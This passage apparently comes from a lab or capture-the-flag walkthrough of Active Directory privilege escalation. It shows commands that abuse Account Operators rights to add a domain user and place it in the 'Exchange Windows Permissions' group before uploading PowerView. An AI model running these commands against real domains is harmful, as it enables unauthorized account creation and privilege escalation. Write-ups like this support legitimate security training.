Notice how the user we are in is part of a group that is part of account operators. Since we are part of Account Operators we can add a new user to the domain.
net user lyethar password /add /domain
We add ourselves to a group we are also part of as the current user. This is the "Exchange Windows Permissions" group.
net group "Exchange Windows Permissions" /add lyethar
We upload Powerview.ps1 and run the following commands.